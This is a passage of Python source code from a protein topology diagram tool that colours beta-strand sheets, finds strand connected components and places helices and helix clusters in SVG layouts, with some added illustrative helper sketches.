nodelist = self.chain_dict[chainid]
indx = nodelist.index(start_strand)
if (indx > 1 and isinstance(nodelist[indx-1], PTNodeStrand) and
nodelist[indx-1].get_sheet_id() == sheetid):
sequence_adjacent_nodes.append(nodelist[indx-1])
if (indx < len(nodelist)-2 and
isinstance(nodelist[indx+1], PTNodeStrand) and
nodelist[indx+1].get_sheet_id() == sheetid):
sequence_adjacent_nodes.append(nodelist[indx+1])
for node in sequence_adjacent_nodes:
if node not in visited:
self.dfs_strands_seq(node, visited, dfs_list, start_strand,
component_id)
def find_connected_components_seq_sheet(self):
"""
Find the connected components (considering only STRAND nodes
and sequence [not bridge] edges in each sheet).
This is done by a DFS traversal at every strand in the sheet
(skipping already visited ones), giving us the partition of
the graph of strand nodes in sheet into connected components.
Used by set_sheet_fold_color() to color strands in a sheet
in components where those adjacent in sequence are colored the
same.
Parameters: None
Return value: the number of components labelled
Uses member data:
sheet_dict - dict of {sheet_id : ptnode_list} representing sheets
chain_dict - dict by chainid of list
of PTNodes in the graph (modifies PTNodes not list)
(WRITE):
Labels each strand node with the sheet connected component
id it belongs to as it goes, starting from 0.
"""
component_id = 0
visited = {} # dictionary of {ptnode : True} visited nodes
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
for node in ptnode_list:
if node not in visited:
connected_node_list = []
self.dfs_strands_seq(node,visited,connected_node_list,None,
component_id)
component_id += 1
return component_id
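# --- Illustrative sketch (not part of the original module) ---
# The component labelling above, reduced to plain data: strands are adjacent
# when they are consecutive in the chain AND belong to the same sheet, and
# each connected component under that relation gets an integer id.  Here a
# chain is just an ordered list of (sse_id, kind, sheet_id) tuples, where kind
# is 'strand' or 'helix'; only strands get a component id.
def _sketch_label_components(chain):
    component_of = {}
    next_id = 0
    for i, (sse_id, kind, sheet_id) in enumerate(chain):
        if kind != 'strand':
            continue
        prev_ok = (i > 0 and chain[i - 1][1] == 'strand'
                   and chain[i - 1][2] == sheet_id)
        if prev_ok:
            component_of[sse_id] = component_of[chain[i - 1][0]]
        else:
            component_of[sse_id] = next_id
            next_id += 1
    return component_of

# e.g. [('S1','strand','A'), ('S2','strand','A'), ('H1','helix',None),
#       ('S3','strand','A')] -> {'S1': 0, 'S2': 0, 'S3': 1}: the helix breaks
# the run, so S3 starts a new component even though it is in the same sheet.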
def set_sheet_fold_color(self):
"""
Set the colors of strands in sheets for the 'fold' color scheme.
For each sheet colors strands that are connected only by
turns (i.e. are consecutive in sequence) one color (maybe more
than one set of such consecutive strands in a sheet, a different
color for each such set), and other strands (i.e. not in a sequence)
another color(s).
Parameters: None
Return value: None
Uses data members:
nodelist, chain_dict, sheet_dict etc.
Modifies nodes by set_color_hex() or set_color() methods
"""
num_components = self.find_connected_components_seq_sheet()
if num_components == 0:
return
# get list of contrasting colors
# see Glasbey et al 2007
color_list = get_glasbey_colors_rgb()
if len(color_list) < num_components:
sys.stderr.write('WARNING: not enough colors in high contrast list')
for (sheet_id, strandlist) in self.sheet_dict.iteritems():
for strand in strandlist:
strand.set_color(color_list[strand.get_seq_component_id() % len(color_list)])
def set_nodelist_colorslist(self, type_color_dict, typekey):
"""
Utility function used by set_node_colors() to set all the nodes
in the nodelist (which are all of the same type) with the color
list from type_color_dict of type typekey, which corresponds to the
type of nodes in nodelist (310 helix, pi helix, alpha helix).
Nodes are colored in order of the colors in the list for the
corresponding type. If they run out (more elements than
colors in the list, the list is treated as circular, i.e. colors
reused from the start of list again). If no colors for that
type, DEFAULT_SHAPE_COLOR_HEXSTR is used.
Parameters:
type_color_dict - dict { type : color_list } where type is
'sheet','helixcluster',
'alpha','pi' or '310' and color_list is list
of color value strings where the color
value strings are 'rrggbb' color strings,
as returned by get_simple_colors()
typekey - key to type_color_dict ie 'alpha', 'pi' etc
Uses data members:
Sets values in nodes in nodelist accessed via iter_helices()
"""
if type_color_dict.has_key(typekey):
color_list = type_color_dict[typekey]
else:
color_list = [DEFAULT_SHAPE_COLOR_HEXSTR]
node_i = 0
for node in [n for n in self.iter_helices() if
n.get_type() == typekey.upper()]:
node.set_color_hex(color_list[node_i % len(color_list)])
node_i += 1
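# --- Illustrative sketch (not part of the original module) ---
# The colour-cycling rule above in two lines: element i of a given type gets
# colour i modulo the length of that type's colour list, falling back to a
# single default colour when no list is configured.  Names here are
# hypothetical, not the module's API.
def _sketch_assign_colors(items, color_list, default='cccccc'):
    palette = color_list if color_list else [default]
    return dict((item, palette[i % len(palette)]) for i, item in enumerate(items))

# e.g. _sketch_assign_colors(['H1', 'H2', 'H3'], ['ff0000', '00ff00'])
# == {'H1': 'ff0000', 'H2': '00ff00', 'H3': 'ff0000'}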
def set_node_colors(self, color_scheme):
"""
Set the color tuple in each node with a color in a gradient
from blue at the N terminal to red at the C terminal in each
chain.
Parameters:
color_scheme: string, one of the following:
'none' : set each shape to default color
'simple' : set strands in sheets from one list of colors,
helices in clusters (if any) to a 2nd list of colors,
alpha, pi and 310 helices each from their own
lists of colors.
'gradient' : color from blue to red
along sequence from N to C terminus.
'sheet' : color the strands in each sheet a different
color (leaving helices default color)
'fold' : color consecutive sequence strands in sheet
one color, others another.
Return value: None
Uses data members:
nodelist, chaindict, sheet_dict etc. (via iter_ functions)
Modifies nodes by set_color_hex() or set_color() methods
Raises Exceptions:
ValueError for unknown color_scheme
"""
if color_scheme[:6] == 'simple':
type_color_dict = get_simple_colors(color_scheme)
# first do helices
self.set_nodelist_colorslist(type_color_dict, "alpha")
if self.include_310_helices:
self.set_nodelist_colorslist(type_color_dict, "310")
if self.include_pi_helices:
self.set_nodelist_colorslist(type_color_dict, "pi")
# NB if helix is part of a cluster, will be
# overwritten in build_helices_heuristic()
# if helix clustering is enabled
# now do strands in sheets
if type_color_dict.has_key('sheet'):
sheet_color_list = type_color_dict['sheet']
else:
sheet_color_list = [DEFAULT_SHAPE_COLOR_HEXSTR]
sheet_i = 0
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
for strand in ptnode_list:
assert(isinstance(strand, PTNodeStrand))
strand.set_color_hex(
sheet_color_list[sheet_i % len(sheet_color_list)] )
sheet_i += 1
# and termini
if type_color_dict.has_key('terminus'):
color_list = type_color_dict['terminus']
else:
color_list = [DEFAULT_SHAPE_COLOR_HEXSTR]
node_i = 0
for node in [n for n in self.iter_nodes() if
isinstance(n, PTNodeTerminus)]:
node.set_color_hex(color_list[node_i % len(color_list)])
node_i += 1
else:
done_color = False # used for things that don't need per-chain code
for nodelist in self.iter_chains():
# local_nodelist omits pi and/or 310 helices if we are not to
# draw them
local_nodelist = [ node for node in nodelist if
not ( isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) )
]
if color_scheme == 'gradient':
rgb_list = list(color_gradient(len(local_nodelist)))
assert(len(rgb_list) == len(local_nodelist))
for i in range(len(local_nodelist)):
local_nodelist[i].set_color(rgb_list[i])
i += 1
elif color_scheme == 'sheet':
if not done_color:
num_sheets = len(list(self.sheet_dict.iteritems()))
# set up list of strand colors, one per sheet, by using
# the color gradient to ensure all sheets have different
# color.
if num_sheets > 0:
sheet_colors = [ rgb for rgb in color_gradient(num_sheets) ]
i = 0
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
for strand in ptnode_list:
assert(isinstance(strand, PTNodeStrand))
strand.set_color(sheet_colors[i])
i += 1
done_color = True
# set all helices and termini to default color
for node in local_nodelist:
if not isinstance(node, PTNodeStrand):
node.set_color_hex(DEFAULT_SHAPE_COLOR_HEXSTR)
elif color_scheme == 'fold':
if not done_color:
self.set_sheet_fold_color()
done_color = True
# set all helices and termini to default color
for node in local_nodelist:
if not isinstance(node, PTNodeStrand):
node.set_color_hex(DEFAULT_SHAPE_COLOR_HEXSTR)
elif color_scheme == 'none':
for node in local_nodelist:
node.set_color_hex(DEFAULT_SHAPE_COLOR_HEXSTR)
else:
raise ValueError('unknown color scheme ' + color_scheme)
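# --- Illustrative sketch (not part of the original module) ---
# The 'gradient' scheme colours SSEs from blue at the N terminus to red at the
# C terminus.  The module gets its ramp from color_gradient(); a minimal
# stand-in with the same shape of output (a list of (r, g, b) tuples) could
# look like this:
def _sketch_blue_to_red(n):
    if n == 1:
        return [(0, 0, 255)]
    return [(int(round(255.0 * i / (n - 1))), 0,
             int(round(255.0 * (n - 1 - i) / (n - 1)))) for i in range(n)]

# e.g. _sketch_blue_to_red(3) == [(0, 0, 255), (128, 0, 128), (255, 0, 0)]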
##########################################################################
#
# functions for heuristic helix placement etc. used when
# not using the -i option
#
def build_interstrand_helices_svg(self, sheet_pos_dict,
sse_label_scheme,
seqnum_dict,
label_residue_numbers):
"""
Build SVG helices that match the special case of being between
two strands in the same vertilist of a sheet. We draw these
beside the relevant sheet insead of along strands axis to
make diagram much neater. See e.g. 2QP2-1 (using STRIDE and DDOMAIN).
Called by build_dunnart_svg()
Parameters:
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-ordinate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of separate sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
ptrelpos -
PTRelativePosition instance, to get strand positions
node_list - ordered list of nodes
(NOTE: sets is_positioned,is_interstrand flags in helices though)
Return value:
None
"""
for nodelist in self.iter_chains():
helix_index = 0
while helix_index < len(nodelist):
helix = nodelist[helix_index]
if not isinstance(helix, PTNodeHelix):
helix_index += 1
continue # only helices handled here
(sheet_id, nterm_strand_index, cterm_strand_index) = \
self.immediate_containing_sheet(helix_index, helix.get_chainid())
if (sheet_id == None or nterm_strand_index == None or
cterm_strand_index == None):
helix_index += 1
continue # not between strands in same sheet
nterm_strand = nodelist[nterm_strand_index]
cterm_strand = nodelist[cterm_strand_index]
sheet_id = nterm_strand.get_sheet_id()
assert(sheet_id == cterm_strand.get_sheet_id())
nterm_strand_posnum = \
self.ptrelpos.get_strand_posnum(nterm_strand)
cterm_strand_posnum = \
self.ptrelpos.get_strand_posnum(cterm_strand)
if (nterm_strand_posnum == cterm_strand_posnum):
# this helix is between two strands in alignment in sheet,
# draw it beside sheet
if verbose:
sys.stderr.write('interstrand helices: helix '
+str(helix) +
' between strands ' +
str(nterm_strand) + ','
+ str(cterm_strand) + '\n')
helix.set_is_interstrand(True)
helix.set_reversed(nterm_strand.get_reversed())
helix.set_sideways(nterm_strand.get_sideways())
if (nterm_strand_posnum >
len(self.sheet_strandlists_dict[sheet_id])/2):
relpos = RELPOS_RIGHT
else:
relpos = RELPOS_LEFT
if nterm_strand.get_sideways():
if relpos == RELPOS_RIGHT:
relpos = RELPOS_BELOW
else:
relpos = RELPOS_ABOVE
(xpos, ypos) = self.relpos_to_pos(sheet_id,
helix,
relpos,
nterm_strand,
None,
sheet_pos_dict)
self.set_helix_svginfo(helix,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
helix_index += 1
def immediate_containing_sheet(self, node_index, chainid):
"""
Return the sheet id of the sheet 'immediately containing' the supplied
node. This is the sheet that the supplied node
(usually a helix) 'interrupts', i.e. if the node is between
two strands of the same sheet, return the id of that sheet.
Returns None if there is no such sheet, e.g. if the node
is between two strands which are not in the same sheet.
Also returns the index in the node_list of the strands found
before and after the supplied node (one or both may be None)
that were used to determine the sheet.
This is done simply by checking forward (towards C-terminal) and
backward (towards N-terminal) from the node until a strand is
found, and returning the sheet id of the strands if they are
from the same sheet. (Note this means that if the node to test
is a strand in a sheet, then that sheet id will be returned, though
this isn't the useful case of this function).
Parameters:
node_index - index in the node list of the
PTNode to find immediate containing sheet for.
chainid - chainid of the node, this is the key of chain_dict
to get the nodelist that node_index is an index of.
Return value:
tuple (sheet_id, nterm_strand_index, cterm_strand_index)
where the cterm_ and nterm_ strand indices are the indices
in the node_list of the strands in the N- and C- terminal
directions that were used to determine the sheet_id.
Any (or all) of these may be None.
Uses data members (readonly):
chain_dict - dict by chainid of ordered list of PTNodes
"""
nodelist = self.chain_dict[chainid]
# find first strand towards N-terminal
nterm_strand = None
nterm_strand_index = None
for i in range(node_index - 1, -1, -1):
if isinstance(nodelist[i], PTNodeStrand):
nterm_strand_index = i
nterm_strand = nodelist[i]
break
# find first strand towards C-terminal
cterm_strand = None
cterm_strand_index = None
for i in range(node_index + 1, len(nodelist)):
if isinstance(nodelist[i], PTNodeStrand):
cterm_strand_index = i
cterm_strand = nodelist[i]
break
if cterm_strand != None and nterm_strand != None:
if nterm_strand.get_sheet_id() == cterm_strand.get_sheet_id():
return (nterm_strand.get_sheet_id(), nterm_strand_index,
cterm_strand_index)
return (None, nterm_strand_index, cterm_strand_index)
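# --- Illustrative sketch (not part of the original module) ---
# The scan above in isolation: from a position in the chain, walk towards the
# N terminus and towards the C terminus until a strand is found on each side,
# and report the shared sheet id if both flanking strands belong to the same
# sheet.  Nodes are plain (kind, sheet_id) tuples here.
def _sketch_flanking_sheet(chain, index):
    def first_strand(indices):
        for i in indices:
            if chain[i][0] == 'strand':
                return i
        return None
    n_idx = first_strand(range(index - 1, -1, -1))
    c_idx = first_strand(range(index + 1, len(chain)))
    if (n_idx is not None and c_idx is not None
            and chain[n_idx][1] == chain[c_idx][1]):
        return chain[n_idx][1], n_idx, c_idx
    return None, n_idx, c_idx

# e.g. chain = [('strand', 'A'), ('helix', None), ('strand', 'A')]
# _sketch_flanking_sheet(chain, 1) == ('A', 0, 2)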
def count_helices_on_strand_axis(self, strand, strand_pos_dict):
"""
Count the number of helices above and below (or left and right of)
the supplied strand. Called by build_helices_svg()
and room_for_helix_cluster().
Parameters:
strand - PTNodeStrand of the strand to count aligned helices for
strand_pos_dict - The strand_ypos_dict from build_helices_svg():
{ nodeid : (ypos_above, ypos_below, sideways,
num_helices_aligned_above, num_helices_aligned_below) }
e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
Return value:
tuple (num_above, num_below) where num_above is number of helices
above (or left of) strand on same axis, and num_below is the number
below (or right of) strand on same axis.
Uses data members: None
"""
(ypos_above_unused, ypos_below_unused, sideways,
num_helices_aligned_above_strand,
num_helices_aligned_below_strand) = \
strand_pos_dict[strand.nodeid]
return (num_helices_aligned_above_strand,
num_helices_aligned_below_strand)
# xpos = strand.xpos
# ypos = strand.ypos
# if sideways:
# alignpos = ypos
# slidepos = xpos
# else:
# alignpos = xpos
# slidepos = ypos
# num_above = 0
# num_below = 0
# for node in self.iter_nodes():
# nodeid = node.nodeid
# xpos = node.xpos
# ypos = node.ypos
# if sideways:
# testpos = ypos
# testslidepos = xpos
# else:
# testpos = xpos
# testslidepos = ypos
# if (testpos == alignpos and
# isinstance(node, PTNodeHelix)):
# if testslidepos < slidepos:
# num_above += 1
# else:
# num_below += 1
# return (num_above, num_below)
def room_for_helix_cluster(self, seq_strand, seqpos,
strand_pos_dict):
"""
Return True if there would be room to place the helix cluster
before/after (seqpos) the seq_strand. Else False.
Checks for helices aligned on strand axes on the same side of the
sheet as the cluster would be aligned. If there are any then
we decide that the helix cluster may not fit there.
Called by build_helices_svg().
Parameters:
seq_strand - PTNodeStrand of strand the helix cluster would
be aligned (by its first helix) to
seqpos - SEQPOS_AFTER or _BEFORE the seq_strand
strand_pos_dict - The strand_ypos_dict from build_helices_svg():
{ nodeid : (ypos_above, ypos_below, sideways,
num_helices_aligned_above, num_helices_aligned_below) }
e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
Return value:
True if there would be room to place the helix cluster
before/after (seqpos) the seq_strand. Else False.
Uses data members:
sheet_strandlists_dict - the dictionary (by sheet id)
of list of lists built by
build_constraints()
"""
sheetid = seq_strand.get_sheet_id()
if ( (seq_strand.get_reversed() and seqpos == SEQPOS_AFTER) or
(not seq_strand.get_reversed() and seqpos == SEQPOS_BEFORE) ):
cluster_relpos = RELPOS_BELOW
else:
cluster_relpos = RELPOS_ABOVE
# print 'ddddd',sheetid,ptrelpos_to_str(cluster_relpos)
helices_found = 0
for vertlist in self.sheet_strandlists_dict[sheetid]:
for strand in vertlist: # FIXME: should not need all in vertlist
(num_helices_above_strand,
num_helices_below_strand) = \
self.count_helices_on_strand_axis(strand,
strand_pos_dict)
# print 'fff',strand,num_helices_above_strand,num_helices_below_strand
if cluster_relpos == RELPOS_BELOW:
helices_found += num_helices_below_strand
else:
helices_found += num_helices_above_strand
if helices_found > 0:
# print 'eeeee',helices_found
return False
return True
def helix_is_sheet_gap(self, helix, nterm_strand, cterm_strand, seqpos,
seq_strand, sheet_posmap,
is_helix_cluster=False):
"""
Return True if the supplied helix would be undesirably forcing
a gap between sheets when placed on the axis using the
build_helices_svg() method. That is, if it is to be
positioned on an axis which is between two sheets that have
been placed next to each other.
Note we do NOT return True if the helix is actually in sequence
between strands in each of the sheets and those strands have
the same direction; in that case we DO want to place
it between them, UNLESS the helix is part of a cluster, in which
case we still don't.
Parameters:
helix - PTNodeHelix to test
nterm_strand - next strand along chain in N-terminal direction
cterm_strand - next strand along chain in C-terminal direction
seqpos - SEQPOS_AFTER or _BEFORE as calculated in build_helices_svg()
seq_strand - the PTNode strand whose axis the helix would be placed
on. Must be one of nterm_strand or cterm_strand
sheet_posmap - the PTPosMap of sheet positionings
is_helix_cluster - the helix is part of a helix cluster
default False
Return value:
True if we do not want to position the helix on the axis as we
normally would, False otherwise.
"""
assert(seq_strand != None)
assert(seq_strand == nterm_strand or seq_strand == cterm_strand)
assert(seqpos == SEQPOS_AFTER or seqpos == SEQPOS_BEFORE)
sheet_id = seq_strand.get_sheet_id()
if cterm_strand != None and cterm_strand != seq_strand:
other_sheet_id = cterm_strand.get_sheet_id()
elif nterm_strand != None and nterm_strand != seq_strand:
other_sheet_id = nterm_strand.get_sheet_id()
else:
other_sheet_id = None
sideways = seq_strand.get_sideways()
if sideways:
if seqpos == SEQPOS_AFTER:
direction = RELPOS_LEFT
else:
direction = RELPOS_RIGHT
else:
if seqpos == SEQPOS_AFTER:
direction = RELPOS_ABOVE
else:
direction = RELPOS_BELOW
try:
sheet_neighbours = sheet_posmap[sheet_id]
# print 'yyyy',sheet_id,':',str(sheet_neighbours),sideways,ptrelpos_to_str(direction)
except KeyError:
return False # no neighbouring sheets
neighbour_sheet_id = sheet_neighbours.get_neighbour(direction)
if neighbour_sheet_id == None:
return False # no neighbour sheet in this direction
if (neighbour_sheet_id == other_sheet_id and
nterm_strand.get_sideways() == cterm_strand.get_sideways() and
nterm_strand.get_reversed() == cterm_strand.get_reversed() and
not is_helix_cluster):
return False # in seq between same direction strands in each sheet
else:
if verbose:
sys.stderr.write('helix_is_sheet_gap: ' + str(helix) +
' between sheet ' + sheet_id + ' and sheet ' +
neighbour_sheet_id + '\n')
return True
def find_helix_xypos(self, helix, seq_strand, sheet_posmap,
sheet_pos_dict,
enable_sheet_gap_rule):
"""
Get position the helix near the sheet seq_strand is in
according to position map for relative position and tableau
for orientation
Parameters:
helix - PTNode helix to get position for
seq_strand - strand that the helix is in sequence next to
sheet_posmap - The PTPosMap of sheet neighbour relationships
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-ordinate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
enable_sheet_gap_rule - If True, don't align helices on strand
indguides between neihbouring sheets, if the
total helix length is above a threshold.
Return value:
tuple (xpos, ypos) to place the helix at
"""
# position the helix near the sheet seq_strand is in
# according to position map for relative position and tableau
# for orientation
(relpos, pos_strand, cur_strand) = \
self.ptrelpos.get_relative_position(seq_strand.get_sheet_id(),
helix)
if enable_sheet_gap_rule:
sheet_id = seq_strand.get_sheet_id()
if sheet_posmap.has_key(sheet_id):
# don't position the helices where they would
# get between neighbouring sheets, place them
# where there is nothing beside the sheet if possible
sheet_neighbours = sheet_posmap[sheet_id]
if (sheet_neighbours.get_neighbour(relpos) != None):
if verbose:
sys.stderr.write('sheet gap rule: cannot place ' +
str(helix) + ' ' +
ptrelpos_to_str(relpos) + ' ' +
'sheet ' + sheet_id + '\n')
# FIXME: arbitrary helix positioning here
if (sheet_neighbours.north == None):
relpos = RELPOS_ABOVE
elif (sheet_neighbours.south == None):
relpos = RELPOS_BELOW
elif (sheet_neighbours.east == None):
relpos = RELPOS_RIGHT
elif (sheet_neighbours.west == None):
relpos = RELPOS_LEFT
else:
sys.stderr.write('WARNING: nowhere to place ' +
str(helix) + ' relative to sheet '
+ sheet_id + ' (sheet gap rule)\n')
# FIXME: need to do something about this...
if verbose:
sys.stderr.write(' sheet gap rule: placing ' +
str(helix) + ' ' +
ptrelpos_to_str(relpos) + ' of '
'sheet ' + sheet_id + '\n')
(xpos, ypos) = self.relpos_to_pos(seq_strand.get_sheet_id(),
helix,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
return (xpos, ypos)
def build_helices_svg(self, sheet_pos_dict,
sse_label_scheme,
seqnum_dict, sheet_posmap,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
color_scheme,
interdomain_connectors,
label_residue_numbers=False):
"""
Build SVG for helices and n- and c- terminus nodes.
Called by build_dunnart_svg()
Parameters:
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-ordinate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of separate sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
sheet_posmap - The PTPosMap of sheet neighbour relationships
enable_sheet_gap_rule - If True, don't align helices on strand
indguides between neighbouring sheets, if the
total helix length is above a threshold.
use_helix_clustering - If True and using heuristic
helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
color_scheme: 'none', 'simple', 'gradient', 'sheet', 'fold'.
Only needed because in simple scheme need to color
helices in clusters specially, but don't know about
helix clusters until build_helices_heuristic().
interdomain_connectors - make connectors between domains rather
than using pseudo-terminus nodes as normally used
(such as when one domain per file).
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
(NOTE: sets is_positioned flag in helices though)
include_pi_helices, include_310_helices - flags to include or not
(write):
helix_cluster_id_generator (initialized here)
Return value:
None
"""
# NOTE: horiz/vert and x/y and height/width, top/bot
# names may be somewhat confusing in
# here now since sideways strands reverse the meanings of these
# things... (i.e. height is actually width, 'horiz_indguides' are
# vertical, etc. variable names and comments assume up/down
# (i.e. not sideways)
# un-reversed normally is pointing 'up' (reversed is down)
# un-reversed when sideways is pointing 'left' (reversed is right)
# dictionary mapping strand id to current y position of other nodes
# (helices) on the vertical axis (indguide) of that strand.
# Use to keep track of y co-ordinate to give helices when there
# are multiple positioned above/below the strand
# { nodeid : (ypos_above, ypos_below, sideways,
# num_helices_aligned_above, num_helices_aligned_below) }
# e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
# Note there are ypos_above and ypos_below since the strand may have
# helices before and after (above and below, or below and above,
# respectively, depending on whether the strand is reversed or not) and
# so we need to keep track of both of them separately.
strand_ypos_dict = {}
# number helix clusters (if any) starting from 1
self.helix_cluster_id_generator = GenSeqId(1)
# set up the strand_ypos_dict for use in positioning helices
# below
for strand in self.iter_strands():
assert(isinstance(strand, PTNodeStrand))
nnodeid = strand.nodeid
sheet_id = strand.get_sheet_id()
if strand.get_sideways():
ypos_above = sheet_pos_dict[sheet_id][2] - get_min_gap_size()
ypos_below = sheet_pos_dict[sheet_id][3] + get_min_gap_size()
sideways = True
else:
ypos_above = sheet_pos_dict[sheet_id][0] - get_min_gap_size()
ypos_below = sheet_pos_dict[sheet_id][1] + get_min_gap_size()
sideways = False
strand_ypos_dict[nnodeid] = (ypos_above, ypos_below, sideways,
0, 0)
unpositioned_termini = [] # list of tuples (node, nodelist)
unpositioned_helices = [] # list of tuples (node, seq_strand)
unpositioned_helix_clusters = [] # list of tuples ([list of helices in
# cluster], seq_strand, seqpos)
for nodelist in self.iter_chains():
node_index = 0
while node_index < len(nodelist):
node = nodelist[node_index]
if not isinstance(node, PTNodeHelix) and \
not isinstance(node, PTNodeTerminus):
node_index += 1
continue # only helices and termini handled here
if isinstance(node, PTNodeHelix) and node.get_is_positioned():
node_index += 1
continue # this helix has already been written
if ( isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ):
node_index += 1
continue # a 310 or pi helix and we're not drawing them
if ( interdomain_connectors and
isinstance(node, PTNodeTerminus) and node.get_pseudo() ):
node_index += 1
continue # not drawing pseudo-termini
node_index = \
self.build_helices_heuristic(
sheet_pos_dict,
sse_label_scheme,
seqnum_dict, sheet_posmap,
enable_sheet_gap_rule,
strand_ypos_dict,
unpositioned_termini,
unpositioned_helices,
unpositioned_helix_clusters,
nodelist,
node_index,
use_helix_clustering,
helix_cluster_shading_color,
color_scheme,
interdomain_connectors,
label_residue_numbers)
# END of while loop over nodelist
# END of iteration over chains
# process any helices that could not be positioned earlier, now
# by using the distance matrix placement algorithm (for unpositioned
# helices) or helix clustering algorithm (for unpositioned helix
# clusters)
# first do the unpositioned helices not in a cluster
for (helix, seq_strand) in unpositioned_helices:
(xpos, ypos) = self.find_helix_xypos(helix, seq_strand,
sheet_posmap,
sheet_pos_dict,
enable_sheet_gap_rule)
self.set_helix_svginfo(helix,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
# now do the unpositioned helix clusters
for (helix_cluster_list, seq_strand, seqpos) in \
unpositioned_helix_clusters:
clusterid = self.helix_cluster_id_generator.next()
for helix in helix_cluster_list:
helix.set_cluster_id(clusterid)
self.build_helix_cluster(sse_label_scheme,
seqnum_dict,
strand_ypos_dict,
seq_strand,
seqpos,
helix_cluster_list,
clusterid,
helix_cluster_shading_color,
sheet_posmap,
sheet_pos_dict,
label_residue_numbers)
# and now process any termini nodes that we could not position earlier
for (termnode, nodelist) in unpositioned_termini:
if ( interdomain_connectors and termnode.get_pseudo() ):
continue # not drawing pseudo-termini
(node_xpos, node_ypos) = self.find_terminus_pos(termnode,
nodelist)
self.set_terminus_svginfo(termnode,
node_xpos, node_ypos)
def build_helices_heuristic(self,
sheet_pos_dict,
sse_label_scheme,
seqnum_dict, sheet_posmap,
enable_sheet_gap_rule,
strand_ypos_dict,
unpositioned_termini,
unpositioned_helices,
unpositioned_helix_clusters,
nodelist,
node_index,
use_helix_clustering,
helix_cluster_shading_color,
color_scheme,
interdomain_connectors,
label_residue_numbers = False):
"""
Build SVG for helices and n- and c- terminus nodes for a single chain.
Called by build_helices_svg()
Parameters:
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-ordinate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of separate sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
sheet_posmap - The PTPosMap of sheet neighbour relationships
enable_sheet_gap_rule - If True, don't align helices on strand
indguides between neighbouring sheets, if the
total helix length is above a threshold.
strand_ypos_dict - (IN/OUT)
The strand_ypos_dict from build_helices_svg():
{ nodeid : (ypos_above, ypos_below, sideways,
num_helices_aligned_above, num_helices_aligned_below) }
e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
unpositioned_termini - (IN/OUT) list of tuples
(node, nodelist)
unpositioned_helices - (IN/OUT) list of tuples (node, seq_strand)
unpositioned_helix_clusters - (IN/OUT) list of ([list of helices in
helix cluster], seq_strand, seqpos)
nodelist - list of nodes in chain to process
node_index - index of the current node to process in the nodelist
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
color_scheme: 'none', 'simple', 'gradient', 'sheet', 'fold'.
Only needed because in simple scheme need to color
helices in clusters specially, but don't know about
helix clusters until build_helices_heuristic().
interdomain_connectors - If True, do NOT make pseudo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left to have connectors to the other domain
added later. Default False.
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
(NOTE: sets is_positioned flag, cluster_id in helices though)
include_pi_helices, include_310_helices - flags to include or not
(read/write):
helix_cluster_dict - dict { clusterid : PTSVGCluster }
helix_cluster_id_generator
xmlid_generator
Return value:
node_index where
node_index is the index of the next node in the nodelist to be
processed (index for while loop over nodelist in build_helices_svg())
"""
# if total length of helices on an axis between two sheets is
# greater than this then do not position the helices there,
# instead place them later using distance matrix method
SHEET_GAP_HELIX_LEN = 10 # 10 means ANY helix is long enough
# when using helix 'clustering' this is the minimum number
# helices required to make a cluster rather than just align
# on indguide.
MIN_HELIX_CLUSTER_SIZE = 2
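# (Clarifying note on these thresholds: a run of consecutive helices only
# becomes a 'cluster' when it contains more than MIN_HELIX_CLUSTER_SIZE,
# i.e. 3 or more helices, and the sheet gap rule below only triggers when
# the summed helix spans, scaled by DUNNART_HELIX_SPAN_FACTOR, exceed
# SHEET_GAP_HELIX_LEN and the helices lie between neighbouring sheets.)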
node = nodelist[node_index]
# position nodes near (above or below) the sheet they
# 'belong to'. Relative to a normal (not reversed, so
# 'pointing up') strand, nodes go below the sheet if before
# the strand in sequence, and above the sheet if after the
# strand in sequence. If the strand is reversed, so is this,
